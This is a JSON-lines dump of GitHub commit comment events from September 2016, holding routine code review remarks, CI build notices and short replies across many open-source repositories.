{"id":"4581762923","type":"CommitCommentEvent","actor":{"login":"ocornut"},"repo":{"name":"ocornut/imgui"},"payload":{"comment":{"id":19074667,"position":null,"line":null,"path":null,"commit_id":"86666489df97d40edef64196db43963cd0ba335f","created_at":"2016-09-19T07:33:03Z","updated_at":"2016-09-19T07:33:03Z","body":"Very much so, sorry for that. Fixed now!\r\nhttps://github.com/ocornut/imgui/commit/87d99fce6bd2924bb48d2d4fd05318165dd88f17"}},"created_at":"2016-09-19T07:33:03Z"}
{"id":"4581763508","type":"CommitCommentEvent","actor":{"login":"ocornut"},"repo":{"name":"ocornut/imgui"},"payload":{"comment":{"id":19074669,"position":null,"line":null,"path":null,"commit_id":"86666489df97d40edef64196db43963cd0ba335f","created_at":"2016-09-19T07:33:14Z","updated_at":"2016-09-19T07:33:14Z","body":"Thanks Robert!"}},"created_at":"2016-09-19T07:33:14Z"}
{"id":"4581764007","type":"CommitCommentEvent","actor":{"login":"karthiksbhat"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":19074671,"position":49,"line":61,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"907475ed899f7f6a5bb29ac69929fb56f9645739","created_at":"2016-09-19T07:33:25Z","updated_at":"2016-09-19T07:33:25Z","body":"Oh cool. Used it now."}},"created_at":"2016-09-19T07:33:25Z"}
{"id":"4581764031","type":"CommitCommentEvent","actor":{"login":"claureano11"},"repo":{"name":"claureano11/test"},"payload":{"comment":{"id":19074672,"position":null,"line":null,"path":null,"commit_id":"ecb67b7bcb5b19aa02a6c747a57281a1206d98d8","created_at":"2016-09-19T07:33:25Z","updated_at":"2016-09-19T07:33:25Z","body":"cambio"}},"created_at":"2016-09-19T07:33:25Z"}
{"id":"4581767146","type":"CommitCommentEvent","actor":{"login":"hongdou0216"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19074678,"position":7,"line":7,"path":"shishuo/view.tpl","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T07:34:20Z","updated_at":"2016-09-19T07:34:20Z","body":"wave-type-change这部分为什么不用tpl.js的方式渲染了"}},"created_at":"2016-09-19T07:34:20Z"}
{"id":"4581768059","type":"CommitCommentEvent","actor":{"login":"yomimono"},"repo":{"name":"ocamllabs/icfp2016-blog"},"payload":{"comment":{"id":19074681,"position":null,"line":null,"path":null,"commit_id":"fff55bdb9e3745a630d4b898f928d50ead9a0d3f","created_at":"2016-09-19T07:34:39Z","updated_at":"2016-09-19T07:34:39Z","body":"Ah, thanks @avsm ; sorry about the misfile"}},"created_at":"2016-09-19T07:34:39Z"}
{"id":"4581771294","type":"CommitCommentEvent","actor":{"login":"mareknovotny"},"repo":{"name":"windup/windup-web"},"payload":{"comment":{"id":19074689,"position":10,"line":24,"path":"README.md","commit_id":"81356054193c0c56a2978931dba9bba95fbb1905","created_at":"2016-09-19T07:35:37Z","updated_at":"2016-09-19T07:35:37Z","body":"Why there is a need to install npm as `root` and not in home user folder?\r\n\r\nJust curious as I am looking why my setup doesn't work."}},"created_at":"2016-09-19T07:35:37Z"}
{"id":"4581772656","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19074694,"position":null,"line":null,"path":null,"commit_id":"5bd06a3ed52662e643288529de39973505c4d21d","created_at":"2016-09-19T07:36:01Z","updated_at":"2016-09-19T07:36:01Z","body":"TeamCity Todo :: Build [Build 115](http://109.103.226.38:8512/viewLog.html?buildId=38510&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-19T07:36:01Z"}
{"id":"4581772773","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"nyalldawson/QGIS"},"payload":{"comment":{"id":19074695,"position":10,"line":118,"path":"src/core/auth/qgsauthcertutils.cpp","commit_id":"9fcbdab4f33d69dc63c134759204a6449a7b613d","created_at":"2016-09-19T07:36:04Z","updated_at":"2016-09-19T07:36:04Z","body":"Yeah - the tool I was using had some issues at the time and caused this. It was just a proof of concept andwould be extremely surprised if it merged :p"}},"created_at":"2016-09-19T07:36:04Z"}
{"id":"4581772852","type":"CommitCommentEvent","actor":{"login":"karthiksbhat"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":19074696,"position":15,"line":23,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"907475ed899f7f6a5bb29ac69929fb56f9645739","created_at":"2016-09-19T07:36:06Z","updated_at":"2016-09-19T07:36:06Z","body":"It needn't be another function because it's not being called anywhere else right? It is specific to '/smsghana'."}},"created_at":"2016-09-19T07:36:06Z"}
{"id":"4581773953","type":"CommitCommentEvent","actor":{"login":"ly0"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":19074700,"position":null,"line":null,"path":null,"commit_id":"26d56c940e7482a7319a86f9aa17e6ec12e1e3ef","created_at":"2016-09-19T07:36:25Z","updated_at":"2016-09-19T07:36:25Z","body":"网线断了wwwwwwwwwwwwww\r\n"}},"created_at":"2016-09-19T07:36:25Z"}
{"id":"4581773968","type":"CommitCommentEvent","actor":{"login":"mareknovotny"},"repo":{"name":"windup/windup-web"},"payload":{"comment":{"id":19074701,"position":19,"line":41,"path":"README.md","commit_id":"81356054193c0c56a2978931dba9bba95fbb1905","created_at":"2016-09-19T07:36:25Z","updated_at":"2016-09-19T07:36:25Z","body":"I noticed this is in installing of npm modules done automatically or is not that enough?\r\nJust curious as I am looking why my setup doesn't work."}},"created_at":"2016-09-19T07:36:25Z"}
{"id":"4581774312","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19074703,"position":null,"line":null,"path":null,"commit_id":"5bd06a3ed52662e643288529de39973505c4d21d","created_at":"2016-09-19T07:36:32Z","updated_at":"2016-09-19T07:36:32Z","body":"TeamCity Todo :: Build [Build 115](http://109.103.226.38:8512/viewLog.html?buildId=38510&buildTypeId=Todo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 17 Build time: 00:00:28"}},"created_at":"2016-09-19T07:36:32Z"}
{"id":"4581777752","type":"CommitCommentEvent","actor":{"login":"naveenvalluru"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19074729,"position":null,"line":null,"path":null,"commit_id":"9f6ecedecc7d9601c72a3019b4b69b02ed0fb269","created_at":"2016-09-19T07:37:36Z","updated_at":"2016-09-19T07:37:36Z","body":"import java.io.*;\r\nimport java.util.*;\r\n\r\n\r\nclass Ht\r\n{\r\npublic static void main(String args[])\r\n{\r\nString head,qoute;\r\nScanner sc=new Scanner(System.in);\r\nSystem.out.println(\"enter two strings\");\r\nhead=sc.nextLine();\r\nqoute=sc.nextLine();\r\n\r\nSystem.out.println(\"<\"+head+\">\"+qoute+\"</\"+head+\">\");\r\n}\r\n}"}},"created_at":"2016-09-19T07:37:36Z"}
{"id":"4581777953","type":"CommitCommentEvent","actor":{"login":"mareknovotny"},"repo":{"name":"windup/windup-web"},"payload":{"comment":{"id":19074732,"position":5,"line":31,"path":"README.md","commit_id":"c09a985f3f79d6a7996106a9e26c0c38a7abe6e5","created_at":"2016-09-19T07:37:40Z","updated_at":"2016-09-19T07:37:40Z","body":"this should be ui/src/main/webapp as this readme is relative to **windup-web**, right?"}},"created_at":"2016-09-19T07:37:40Z"}
{"id":"4581779549","type":"CommitCommentEvent","actor":{"login":"rvansa"},"repo":{"name":"chrisdennis/hibernate-orm"},"payload":{"comment":{"id":19074738,"position":47,"line":460,"path":"hibernate-core/src/main/java/org/hibernate/engine/spi/SessionFactoryImplementor.java","commit_id":"af74e5f9d61a92919b408f355827a4ad287f9cdb","created_at":"2016-09-19T07:38:10Z","updated_at":"2016-09-19T07:38:10Z","body":"Why read only? This should rather find out the default strategy..."}},"created_at":"2016-09-19T07:38:10Z"}
{"id":"4581781656","type":"CommitCommentEvent","actor":{"login":"mareknovotny"},"repo":{"name":"windup/windup-web"},"payload":{"comment":{"id":19074739,"position":43,"line":34,"path":"README.md","commit_id":"133853aab91372f640fbe8e438e90e978301fe96","created_at":"2016-09-19T07:38:47Z","updated_at":"2016-09-19T07:38:47Z","body":"again all npm install commands are using global install but for root or whole distribution, but why is not user home enough?"}},"created_at":"2016-09-19T07:38:47Z"}
{"id":"4581782372","type":"CommitCommentEvent","actor":{"login":"valegagge"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":19074741,"position":null,"line":null,"path":null,"commit_id":"cd2028daac5afcddb220f3b6a7bfe6caa4abdf7b","created_at":"2016-09-19T07:39:02Z","updated_at":"2016-09-19T07:39:02Z","body":"No. We copied the file from icubGenova05, but we forgot to rename it in icubGenova04.\r\n\r\nWe'll do asap."}},"created_at":"2016-09-19T07:39:02Z"}
{"id":"4581784618","type":"CommitCommentEvent","actor":{"login":"aquarhead"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":19074745,"position":null,"line":null,"path":null,"commit_id":"f373105be11c6d2375ee310731fb2cab7cb12893","created_at":"2016-09-19T07:39:42Z","updated_at":"2016-09-19T07:39:42Z","body":"❤️ ❤️ ❤️ "}},"created_at":"2016-09-19T07:39:42Z"}
{"id":"4581786916","type":"CommitCommentEvent","actor":{"login":"ChengLuffy"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19074748,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T07:40:22Z","updated_at":"2016-09-19T07:40:22Z","body":"If what happened, hope you peace"}},"created_at":"2016-09-19T07:40:22Z"}
{"id":"4581788427","type":"CommitCommentEvent","actor":{"login":"Palmidence"},"repo":{"name":"Avicus/Rotations"},"payload":{"comment":{"id":19074751,"position":null,"line":null,"path":null,"commit_id":"f3e327a55afd4522d03c16adc6bf73c3e2de9c75","created_at":"2016-09-19T07:40:50Z","updated_at":"2016-09-19T07:40:50Z","body":"I asked @Fouled to help fix this D:"}},"created_at":"2016-09-19T07:40:50Z"}
{"id":"4581789850","type":"CommitCommentEvent","actor":{"login":"vinosgrayapple"},"repo":{"name":"vinosgrayapple/hw_js_09_10_2"},"payload":{"comment":{"id":19074754,"position":null,"line":null,"path":null,"commit_id":"bdabb7c2c8e03e98dcc7ba0eddd90fed3c32a038","created_at":"2016-09-19T07:41:15Z","updated_at":"2016-09-19T07:41:15Z","body":"merge master to  gh-pages"}},"created_at":"2016-09-19T07:41:15Z"}
{"id":"4581790157","type":"CommitCommentEvent","actor":{"login":"danielearwicker"},"repo":{"name":"danielearwicker/immuto-example"},"payload":{"comment":{"id":19074755,"position":3,"line":2,"path":"components/ShelfEditor.tsx","commit_id":"c132d4f3da6095c2069fb85ae97989d104057139","created_at":"2016-09-19T07:41:21Z","updated_at":"2016-09-19T07:41:21Z","body":"Thanks for thoughtful feedback. Idea with these components is not to be the One Offical Way to do forms. More like a minimal starting point. All props are passed through so you can style exactly like the raw input element. It just adds `binding`. And if it gets in the way, the source is there to see how little magic is involved to create your own. Does that make sense?"}},"created_at":"2016-09-19T07:41:21Z"}
{"id":"4581790990","type":"CommitCommentEvent","actor":{"login":"mareknovotny"},"repo":{"name":"windup/windup-web"},"payload":{"comment":{"id":19074756,"position":2,"line":2,"path":"scripts/eap-setup.cli","commit_id":"81f69ed8cdf447424edf8d1938c91b2adc063274","created_at":"2016-09-19T07:41:37Z","updated_at":"2016-09-19T07:41:37Z","body":"this file should be named as jms-setup.cli unless we add here some other cli commands for other setup. Is there any objection to renaming?"}},"created_at":"2016-09-19T07:41:37Z"}
{"id":"4581796726","type":"CommitCommentEvent","actor":{"login":"ronajohn"},"repo":{"name":"ronajohn/ronajohn.github.io"},"payload":{"comment":{"id":19074762,"position":null,"line":null,"path":null,"commit_id":"86b7bd1aab51287ca44fee4fbfe93f75dd797c49","created_at":"2016-09-19T07:43:20Z","updated_at":"2016-09-19T07:43:20Z","body":"very good"}},"created_at":"2016-09-19T07:43:20Z"}
{"id":"4581796791","type":"CommitCommentEvent","actor":{"login":"mantono"},"repo":{"name":"mantono/GymData"},"payload":{"comment":{"id":19074763,"position":17,"line":0,"path":"src/com/mantono/gym/Load.java","commit_id":"d231425eb0b7ce34bc3199604d9b3cfa01fad0f8","created_at":"2016-09-19T07:43:21Z","updated_at":"2016-09-19T07:43:21Z","body":"Bias can be one, but the comment implies that it is not possible. "}},"created_at":"2016-09-19T07:43:21Z"}
{"id":"4581796950","type":"CommitCommentEvent","actor":{"login":"facchinm"},"repo":{"name":"arduino/Arduino"},"payload":{"comment":{"id":19074765,"position":23,"line":496,"path":"hardware/arduino/avr/cores/arduino/USBCore.cpp","commit_id":"2c5dd2029807a7d3fe76ed86a81643db088b5c2c","created_at":"2016-09-19T07:43:24Z","updated_at":"2016-09-19T07:43:24Z","body":"This piece of code is intended to handle the case when the host OS is not aware of composite devices (like pre SP2 XP and vintage OSX) so `USB_DeviceDescriptor` \"advertises\" the board as a CDC only device."}},"created_at":"2016-09-19T07:43:24Z"}
{"id":"4581801608","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19074769,"position":null,"line":null,"path":null,"commit_id":"1836fe2d30c7a83a63f32ff2c0cfa0e0367b21df","created_at":"2016-09-19T07:44:42Z","updated_at":"2016-09-19T07:44:42Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35613/testReport/) for this commit**"}},"created_at":"2016-09-19T07:44:42Z"}
{"id":"4581801615","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19074770,"position":null,"line":null,"path":null,"commit_id":"1836fe2d30c7a83a63f32ff2c0cfa0e0367b21df","created_at":"2016-09-19T07:44:43Z","updated_at":"2016-09-19T07:44:43Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35612/testReport/) for this commit**"}},"created_at":"2016-09-19T07:44:43Z"}
{"id":"4581801792","type":"CommitCommentEvent","actor":{"login":"skip405"},"repo":{"name":"SpadarShut/vPause"},"payload":{"comment":{"id":19074771,"position":5,"line":5,"path":"source/_locales/en/messages.json","commit_id":"426a1b93c1901b0f350420d2a41ff757fbdde725","created_at":"2016-09-19T07:44:45Z","updated_at":"2016-09-19T07:44:45Z","body":"Doesn't look like English :)"}},"created_at":"2016-09-19T07:44:45Z"}
{"id":"4581804137","type":"CommitCommentEvent","actor":{"login":"ultraq"},"repo":{"name":"ultraq/thymeleaf-layout-dialect"},"payload":{"comment":{"id":19074774,"position":null,"line":null,"path":null,"commit_id":"6b704157bde69d6ee79f267897ebdbd7e4bc94f8","created_at":"2016-09-19T07:45:23Z","updated_at":"2016-09-19T07:45:23Z","body":"Agree.  I think even a plain old `HashMap` would suffice here - all we need is a basic map."}},"created_at":"2016-09-19T07:45:23Z"}
{"id":"4581808457","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19074781,"position":null,"line":null,"path":null,"commit_id":"1836fe2d30c7a83a63f32ff2c0cfa0e0367b21df","created_at":"2016-09-19T07:46:38Z","updated_at":"2016-09-19T07:46:38Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35611/testReport/) for this commit**"}},"created_at":"2016-09-19T07:46:38Z"}
{"id":"4581808947","type":"CommitCommentEvent","actor":{"login":"lostella"},"repo":{"name":"kul-forbes/Prox.jl"},"payload":{"comment":{"id":19074783,"position":null,"line":null,"path":null,"commit_id":"a7e6248dbe59978fb983fa532a7b29520f142c49","created_at":"2016-09-19T07:46:47Z","updated_at":"2016-09-19T07:46:47Z","body":"I mean, there is at least one case where computing f(y) along with y = prox(x; f) is **so** convenient: if f = nuclear norm, then computing y = prox(x; f) requires an SVD of x, soft thresholding of the singular values, and from there to f(y) it's just adding up the soft-thresholded singular values; it would be a waste not to compute f(y) at that point. Unless one has some other way of caching information on x and/or y inside of the function object, so to be able to resume the evaluation of f(y) from the (already stored) SVD of y."}},"created_at":"2016-09-19T07:46:47Z"}
{"id":"4581809871","type":"CommitCommentEvent","actor":{"login":"rvansa"},"repo":{"name":"chrisdennis/hibernate-orm"},"payload":{"comment":{"id":19074786,"position":255,"line":558,"path":"hibernate-core/src/main/java/org/hibernate/internal/CacheImpl.java","commit_id":"af74e5f9d61a92919b408f355827a4ad287f9cdb","created_at":"2016-09-19T07:47:05Z","updated_at":"2016-09-19T07:47:05Z","body":"Yes, too pessimistic. I would rather delegate the check to the implementation (checking existing region + access type + CDD). It sometimes even does not make sense - if you access both A and B with read-only strategy, and A is mutable but B immutable (and you may not have write-access to that class to add the `@Immutable`), why couldn't you put them both into one cache region?\r\n\r\nBtw., `!=` could be more obvious than `^`"}},"created_at":"2016-09-19T07:47:05Z"}
{"id":"4581811735","type":"CommitCommentEvent","actor":{"login":"Nasutya"},"repo":{"name":"Flexberry/ember-flexberry-gis"},"payload":{"comment":{"id":19074796,"position":2,"line":2,"path":"addon/components/base-control.js","commit_id":"301ce7ad298f29982321e11283dbd452228b4878","created_at":"2016-09-19T07:47:37Z","updated_at":"2016-09-19T07:47:37Z","body":"What why?"}},"created_at":"2016-09-19T07:47:37Z"}
{"id":"4581814321","type":"CommitCommentEvent","actor":{"login":"arnaudbesnier"},"repo":{"name":"ForestAdmin/forest-express"},"payload":{"comment":{"id":19074800,"position":null,"line":null,"path":null,"commit_id":"b02bfcdcfc543a36d3d6b13ca3dfebab9509bb0a","created_at":"2016-09-19T07:48:23Z","updated_at":"2016-09-19T07:48:23Z","body":"Yes I understood that a few minutes after the merge... 😢 I fixed it in the next commit: https://github.com/ForestAdmin/forest-express/commit/4ef0d5cf1a80bade09f18561f4fb3996a4daf861"}},"created_at":"2016-09-19T07:48:23Z"}
{"id":"4581815581","type":"CommitCommentEvent","actor":{"login":"skip405"},"repo":{"name":"SpadarShut/vPause"},"payload":{"comment":{"id":19074806,"position":31,"line":143,"path":"source/js/vpause-background.js","commit_id":"426a1b93c1901b0f350420d2a41ff757fbdde725","created_at":"2016-09-19T07:48:45Z","updated_at":"2016-09-19T07:48:45Z","body":"This unused variable has no connection with Commands functionality, please remove :) Add it only when you need it."}},"created_at":"2016-09-19T07:48:45Z"}
{"id":"4581818649","type":"CommitCommentEvent","actor":{"login":"ehiggs"},"repo":{"name":"animeshtrivedi/spark-terasort"},"payload":{"comment":{"id":19074815,"position":4,"line":221,"path":"pom.xml","commit_id":"a0569e3bf1645256630725733ff04b77578446c4","created_at":"2016-09-19T07:49:40Z","updated_at":"2016-09-19T07:49:40Z","body":"Could you make a PR for this? Thank you!"}},"created_at":"2016-09-19T07:49:40Z"}
{"id":"4581819448","type":"CommitCommentEvent","actor":{"login":"alexanderzobnin"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19074817,"position":null,"line":null,"path":null,"commit_id":"0b3050b1808fe0e1c899c5c59a79a36b3b1e946f","created_at":"2016-09-19T07:49:54Z","updated_at":"2016-09-19T07:49:54Z","body":"Can you provide some examples? And better to add these examples to unit tests."}},"created_at":"2016-09-19T07:49:54Z"}
{"id":"4581819464","type":"CommitCommentEvent","actor":{"login":"ehiggs"},"repo":{"name":"animeshtrivedi/spark-terasort"},"payload":{"comment":{"id":19074818,"position":null,"line":null,"path":null,"commit_id":"a0569e3bf1645256630725733ff04b77578446c4","created_at":"2016-09-19T07:49:54Z","updated_at":"2016-09-19T07:49:54Z","body":"Could you turn this into a PR? Thanks!"}},"created_at":"2016-09-19T07:49:54Z"}
{"id":"4581820814","type":"CommitCommentEvent","actor":{"login":"kukukafei"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19074819,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T07:50:18Z","updated_at":"2016-09-19T07:50:18Z","body":"why? "}},"created_at":"2016-09-19T07:50:18Z"}
{"id":"4581822051","type":"CommitCommentEvent","actor":{"login":"mikoxp"},"repo":{"name":"mikoxp/imageProcessing"},"payload":{"comment":{"id":19074828,"position":null,"line":null,"path":null,"commit_id":"b88cc52f40c66691ec88ab97d00649d008fe1479","created_at":"2016-09-19T07:50:38Z","updated_at":"2016-09-19T07:50:38Z","body":"My fault and I correct it"}},"created_at":"2016-09-19T07:50:38Z"}
{"id":"4581823737","type":"CommitCommentEvent","actor":{"login":"nvanrooij"},"repo":{"name":"nvanrooij/MollieApi"},"payload":{"comment":{"id":19074831,"position":null,"line":null,"path":null,"commit_id":"a617ba58fb5105af63aabe6fc23d7a5ff5783dcb","created_at":"2016-09-19T07:51:05Z","updated_at":"2016-09-19T07:51:05Z","body":"MandateID is also a property, but is not yet documented by Mollie"}},"created_at":"2016-09-19T07:51:05Z"}
{"id":"4581825181","type":"CommitCommentEvent","actor":{"login":"blagae"},"repo":{"name":"itext/itext7-samples"},"payload":{"comment":{"id":19074834,"position":null,"line":null,"path":null,"commit_id":"3710a5485a530f7b8c2129b4f70c6f17766b86f2","created_at":"2016-09-19T07:51:25Z","updated_at":"2016-09-19T07:51:25Z","body":"I advise you to run a debugging session on this code to see how this class, and the Renderer Framework in general, interacts with the rest of the application.\r\n\r\nA very brief explanation: the UpdatePageRenderer class adapts the page number associated with a title Paragraph if it doesn't fit on the page anymore (as calculated by ParagraphRenderer#layout). If you run the example but comment out line #87, then you will see that the Table of Contents on the first page contains a few faulty page numbers, e.g. p15 instead of p16 and p25 instead of p26."}},"created_at":"2016-09-19T07:51:25Z"}
{"id":"4581825658","type":"CommitCommentEvent","actor":{"login":"mareknovotny"},"repo":{"name":"windup/windup-web"},"payload":{"comment":{"id":19074837,"position":32,"line":23,"path":"README.md","commit_id":"133853aab91372f640fbe8e438e90e978301fe96","created_at":"2016-09-19T07:51:34Z","updated_at":"2016-09-19T07:51:34Z","body":"why do we need to run this? There is https://github.com/windup/windup-web/blob/master/ui/pom.xml#L148-L180 plugin launch the install instead I think."}},"created_at":"2016-09-19T07:51:34Z"}
{"id":"4581826599","type":"CommitCommentEvent","actor":{"login":"Sorseg"},"repo":{"name":"Adonai/TldrBot"},"payload":{"comment":{"id":19074844,"position":43,"line":114,"path":"src/com/tldr/bot/impl/poller.go","commit_id":"73bc7a4b494ab8497c11054e751b18012d4d5598","created_at":"2016-09-19T07:51:49Z","updated_at":"2016-09-19T07:51:49Z","body":"This check looks excessive since regex literal never changes"}},"created_at":"2016-09-19T07:51:49Z"}
{"id":"4581832745","type":"CommitCommentEvent","actor":{"login":"skip405"},"repo":{"name":"SpadarShut/vPause"},"payload":{"comment":{"id":19074855,"position":2,"line":3,"path":"source/_locales/be/messages.json","commit_id":"426a1b93c1901b0f350420d2a41ff757fbdde725","created_at":"2016-09-19T07:53:37Z","updated_at":"2016-09-19T07:53:37Z","body":"Please correct `уклдадкі`"}},"created_at":"2016-09-19T07:53:37Z"}
{"id":"4581832874","type":"CommitCommentEvent","actor":{"login":"Yulife"},"repo":{"name":"PenguinSquad/Harvest-Festival"},"payload":{"comment":{"id":19074856,"position":null,"line":null,"path":null,"commit_id":"0e71564e04e4f99d07e964bcac2e653701cb8877","created_at":"2016-09-19T07:53:39Z","updated_at":"2016-09-19T07:53:39Z","body":"Am I dreaming"}},"created_at":"2016-09-19T07:53:39Z"}
{"id":"4581838050","type":"CommitCommentEvent","actor":{"login":"abitmore"},"repo":{"name":"steemit/steem"},"payload":{"comment":{"id":19074868,"position":52,"line":92,"path":"libraries/chain/include/steemit/chain/account_object.hpp","commit_id":"6b593c2d8f09d55669e4dfc135937a3c902599f4","created_at":"2016-09-19T07:55:01Z","updated_at":"2016-09-19T07:55:01Z","body":"Need a `string()` operator for `fc::array` so it can be shown in CLI. "}},"created_at":"2016-09-19T07:55:01Z"}
{"id":"4581838200","type":"CommitCommentEvent","actor":{"login":"jefleponot"},"repo":{"name":"casperjs/casperjs"},"payload":{"comment":{"id":19074869,"position":null,"line":null,"path":null,"commit_id":"a34a0102b50821546821adf99aed9792c708e502","created_at":"2016-09-19T07:55:04Z","updated_at":"2016-09-19T07:55:04Z","body":"@mickaelandrieu, I'm sorry because I merge without 2 rewiews. \r\nI will be more watchful next time.\r\n"}},"created_at":"2016-09-19T07:55:04Z"}
{"id":"4581842472","type":"CommitCommentEvent","actor":{"login":"abitmore"},"repo":{"name":"steemit/steem"},"payload":{"comment":{"id":19074870,"position":22,"line":28,"path":"libraries/chain/include/steemit/chain/account_object.hpp","commit_id":"6b593c2d8f09d55669e4dfc135937a3c902599f4","created_at":"2016-09-19T07:56:14Z","updated_at":"2016-09-19T07:56:14Z","body":"The initialization to \"\" is removed?"}},"created_at":"2016-09-19T07:56:14Z"}
{"id":"4581845290","type":"CommitCommentEvent","actor":{"login":"Anylinkin"},"repo":{"name":"Anylinkin/S8266"},"payload":{"comment":{"id":19074874,"position":null,"line":null,"path":null,"commit_id":"eac3306aeb06966876432395a5a5038c814a95a0","created_at":"2016-09-19T07:57:00Z","updated_at":"2016-09-19T07:57:00Z","body":"Software Tookits to Faclitate the ESP8266 Debug and Download"}},"created_at":"2016-09-19T07:57:00Z"}
{"id":"4581849849","type":"CommitCommentEvent","actor":{"login":"milansci35"},"repo":{"name":"k-toffel/letter-clock"},"payload":{"comment":{"id":19074888,"position":2,"line":2,"path":"HelpfullLinks.txt","commit_id":"c3fe4198cacde0d6c83f475dafd17fad73929b2d","created_at":"2016-09-19T07:58:16Z","updated_at":"2016-09-19T07:58:16Z","body":"https://tour.golang.org/welcome/1\r\nhttps://tour.golang.org/basics/1"}},"created_at":"2016-09-19T07:58:16Z"}
{"id":"4581850236","type":"CommitCommentEvent","actor":{"login":"ccrisan"},"repo":{"name":"ccrisan/motioneyeos"},"payload":{"comment":{"id":19074889,"position":null,"line":null,"path":null,"commit_id":"7fe6ed1eb6ef2291b830c3711857595770f01f9d","created_at":"2016-09-19T07:58:23Z","updated_at":"2016-09-19T07:58:23Z","body":"@Lukas1990 what do you mean SSH and SFTP don't work? Could you please give me more details? Also some logs would be great."}},"created_at":"2016-09-19T07:58:23Z"}
{"id":"4581850998","type":"CommitCommentEvent","actor":{"login":"smounives"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19074891,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T07:58:36Z","updated_at":"2016-09-19T07:58:36Z","body":"what happened??"}},"created_at":"2016-09-19T07:58:36Z"}
{"id":"4581856611","type":"CommitCommentEvent","actor":{"login":"being-developer"},"repo":{"name":"being-developer/dipika"},"payload":{"comment":{"id":19074900,"position":7,"line":7,"path":"test/index.html","commit_id":"49880949a648f3b1112d0d14608e06547967bea6","created_at":"2016-09-19T08:00:02Z","updated_at":"2016-09-19T08:00:02Z","body":"<h2>hello</h2>\r\n<h3>hi</h3>\r\n<h3>hi</h3>"}},"created_at":"2016-09-19T08:00:02Z"}
{"id":"4581860169","type":"CommitCommentEvent","actor":{"login":"dorianmuthig"},"repo":{"name":"Froxlor/Froxlor"},"payload":{"comment":{"id":19074907,"position":9,"line":819,"path":"scripts/jobs/cron_tasks.inc.http.10.apache.php","commit_id":"e621e02f92f197164b780bfc2179577da4fb006a","created_at":"2016-09-19T08:00:52Z","updated_at":"2016-09-19T08:00:52Z","body":"There's a capitalization error, which makes this directive either not work at all or at least the HSTS preloader at https://hstspreload.appspot.com/ unhappy:\r\n\r\n```\r\nWarning: Non-standard capitalization of includeSubDomains\r\n\r\nHeader contains the token `includeSubdomains`. The recommended capitalization is `includeSubDomains`.\r\n```"}},"created_at":"2016-09-19T08:00:52Z"}
{"id":"4581862417","type":"CommitCommentEvent","actor":{"login":"xiocode"},"repo":{"name":"git/git"},"payload":{"comment":{"id":19074913,"position":null,"line":null,"path":null,"commit_id":"e83c5163316f89bfbde7d9ab23ca2e25604af290","created_at":"2016-09-19T08:01:28Z","updated_at":"2016-09-19T08:01:28Z","body":"git init"}},"created_at":"2016-09-19T08:01:28Z"}
{"id":"4581864796","type":"CommitCommentEvent","actor":{"login":"NerimaRentai"},"repo":{"name":"HirokiTakenaka/team_meganes"},"payload":{"comment":{"id":19074917,"position":null,"line":null,"path":null,"commit_id":"51618fcec31e18951581fc555c48c56b16de799f","created_at":"2016-09-19T08:02:06Z","updated_at":"2016-09-19T08:02:06Z","body":"ok"}},"created_at":"2016-09-19T08:02:06Z"}
{"id":"4581865503","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"btoueg/LCM-object-viewer"},"payload":{"comment":{"id":19074920,"position":null,"line":null,"path":null,"commit_id":"f5cb048f130d6c6d75c338c98a7120e3d7f4f778","created_at":"2016-09-19T08:02:16Z","updated_at":"2016-09-19T08:02:16Z","body":"I've updated the Readme"}},"created_at":"2016-09-19T08:02:16Z"}
{"id":"4581867171","type":"CommitCommentEvent","actor":{"login":"SabotageAndi"},"repo":{"name":"techtalk/SpecFlow"},"payload":{"comment":{"id":19074924,"position":null,"line":null,"path":null,"commit_id":"c09305499f6586fdc4ff4c2cf451315e3875bdcc","created_at":"2016-09-19T08:02:26Z","updated_at":"2016-09-19T08:02:26Z","body":"I meant 2.2"}},"created_at":"2016-09-19T08:02:26Z"}
